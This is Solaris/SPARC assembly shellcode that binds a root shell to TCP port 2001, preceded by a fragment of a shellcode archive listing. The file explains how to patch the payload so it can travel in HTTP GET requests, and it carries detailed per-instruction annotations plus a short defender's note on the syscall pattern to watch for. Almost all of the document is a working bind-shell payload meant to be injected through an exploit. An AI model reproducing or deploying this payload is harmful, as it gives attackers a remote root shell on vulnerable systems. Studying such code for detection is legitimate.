bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) Linux/x86 - 
execve(/bin/sh) + Polymorphic Shellcode (30 bytes)
!!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $
!!! Bind /bin/sh to TCP port 2001. Calls setuid(0) so /bin/sh won't
!!! drop privileges. After assembly, change the third byte in the
!!! trap instructions to 0x38 to avoid having spaces in the input so that
!!! it may be used in an HTTP GET request. For Solaris/SPARC.
!!!
!!! "I've come here to chew bubble-gum and kick ass...And I'm all out of
!!! bubble gum."
!!! -- Nada (Roddy Piper), "They Live"
!!!
!!! -ghandi < ghandi@mindless.com >
!!!
.global bindsh
.type bindsh,#function

!-----------------------------------------------------------------------
! bindsh: Solaris/SPARC listening-shell payload (purpose and caveats are
! in the file header above).
! Syscall convention used throughout: number in %g1, arguments in
! %o0..%o4, "ta 8" enters the kernel, result comes back in %o0.
! No return value is ever checked: a failed socket/bind/listen/accept
! simply feeds whatever %o0 holds into the next call.
! Register roles:
!   %l0 = &sa       (%sp - 16; a sockaddr built on the caller's stack)
!   %l7 = 16        (%sp - %l0); doubles as sa_len and as the base for
!                   most immediates below, which are written as
!                   %l7 +/- N instead of as a plain constant.
!                   NOTE(review): the file does not say why; presumably
!                   a byte-value constraint on the encoded instructions
!                   (the header only mentions avoiding 0x20 in "ta").
!   %o3 = 0         kept zero after the first block; used where %g0
!                   would normally be the xor source
!   %l2 = s         listening socket
!   %l3 = c         accepted connection
! Defender's view: a single process does socket/bind/listen/accept on
! TCP 2001, three ioctl(I_DUP2FD) calls that place the accepted socket
! on fds 0, 1 and 2, then setuid(0) and execve("/bin/sh"). A shell whose
! stdio is a network socket, on a process that had no listening port
! before, is the observable pattern; the syscall numbers the file pairs
! with each call (230, 232, 233, 234, 62, 23, 59, 160) are what a
! syscall-level audit on this platform would see, in that order.
!-----------------------------------------------------------------------

bindsh: sub %sp, 16, %l0 ! struct sockaddr sa;  (%l0 = %sp - 16)

sub %sp, %l0, %l7; ! %l7 = %sp - (%sp - 16) = 16
st %l7, [%sp - 20] ! int sa_len = 16;  (stored just below sa)

sub %l7, 14, %o0 ! %o0 = 2 = AF_INET
sub %l7, 14, %o1 ! %o1 = 2 = SOCK_STREAM
xor %l1, %l1, %o2 ! %o2 = 0 (protocol)
xor %l1, %l1, %o3 ! %o3 will be used as a %g0 (stays 0 from here on)
sub %l7, 15, %o4 ! %o4 = 1; extra socket() argument -- presumably the Solaris socket-library version arg, verify
add %l7, (230 - 16), %g1 ! %g1 = 230 (socket)
ta 8
xor %o2, %o0, %l2 ! s = socket(AF_INET, SOCK_STREAM, 0);  (%o2 is 0, so %l2 = %o0)

sth %o1, [%sp - 16] ! sa.sin_family = AF_INET;  (%o1 still holds 2)
mov 2001, %l6
sth %l6, [%sp - 14] ! sa.sin_port = 2001;  stored raw: SPARC is big-endian, so this is already network byte order
st %g0, [%sp - 12] ! sa.sin_addr.s_addr = INADDR_ANY;  (binds on every interface)

xor %o3, %l2, %o0 ! %o0 = s
xor %o3, %l0, %o1 ! %o1 = &sa
xor %o3, %l7, %o2 ! %o2 = 16 = sa_len
add %l7, (232 - 16), %g1 ! %g1 = 232 (bind)
ta 8 ! bind(s, &sa, sa_len);

xor %o3, %l2, %o0 ! %o0 = s
sub %l7, (16 - 5), %o1 ! %o1 = 5 (backlog)
add %l7, (233 - 16), %g1 ! %g1 = 233 (listen)
ta 8 ! listen(s, SOMAXCONN);

xor %o3, %l2, %o0 ! %o0 = s
xor %o3, %l0, %o1 ! %o1 = &sa
sub %sp, 20, %o2 ! %o2 = &sa_len
add %l7, (234 - 16), %g1 ! %g1 = 234 (accept); blocks here until a client connects
ta 8
xor %o3, %o0, %l3 ! c = accept(s, &sa, &sa_len);

xor %o3, %l3, %o0 ! %o0 = c
sub %l7, (16 - 9), %o1 ! %o1 = 9 = I_DUP2FD
xor %sp, %sp, %o2 ! %o2 = 0 (target fd: stdin)
add %l7, (62 - 16), %g1 ! %g1 = 62 (ioctl)
ta 8 ! ioctl(c, I_DUP2FD, 0);

xor %o3, %l3, %o0 ! %o0 = c
sub %l7, (16 - 9), %o1 ! %o1 = 9 = I_DUP2FD
add %o3, 1, %o2 ! %o2 = 1 (target fd: stdout)
add %l7, (62 - 16), %g1 ! %g1 = 62 (ioctl)
ta 8 ! ioctl(c, I_DUP2FD, 1);

xor %o3, %l3, %o0 ! %o0 = c
sub %l7, (16 - 9), %o1 ! %o1 = 9 = I_DUP2FD
add %o3, 2, %o2 ! %o2 = 2 (target fd: stderr)
add %l7, (62 - 16), %g1 ! %g1 = 62 (ioctl)
ta 8 ! ioctl(c, I_DUP2FD, 2);

xor %sp, %sp, %o0 ! %o0 = 0;
add %o3, 23, %g1 ! %g1 = 23 (setuid); plain immediate from here on
ta 8 ! setuid(0);
set 0x2f62696e, %l0 ! (void*)sh = '/bin';  (%l0 reused; &sa is no longer needed)
set 0x2f736800, %l1 ! (void*)sh + 4 = '/sh0';  the trailing 0x00 terminates the string
sub %sp, 16, %o0 ! %o0 = '/bin/sh';  path goes at %sp - 16, over the old sa
sub %sp, 8, %o1 ! %o1 = {'/bin/sh', NULL};  argv at %sp - 8
xor %sp, %sp, %o2 ! %o2 = NULL;  (envp)
std %l0, [%sp - 16] ! one 8-byte store of the %l0:%l1 pair = "/bin/sh\0"
st %o0, [%sp - 8] ! argv[0] = sh;
st %g0, [%sp - 4] ! argv[1] = NULL;
add %o3, 59, %g1 ! %g1 = 59 (execve)
ta 8 ! execve(sh, argv, NULL);
xor %sp, %sp, %o0 ! %o0 = 0;  only reached if execve returned, i.e. failed
add %o3, 160, %g1 ! %g1 = 160; (lwp_exit)
ta 8 ! lwp_exit(0)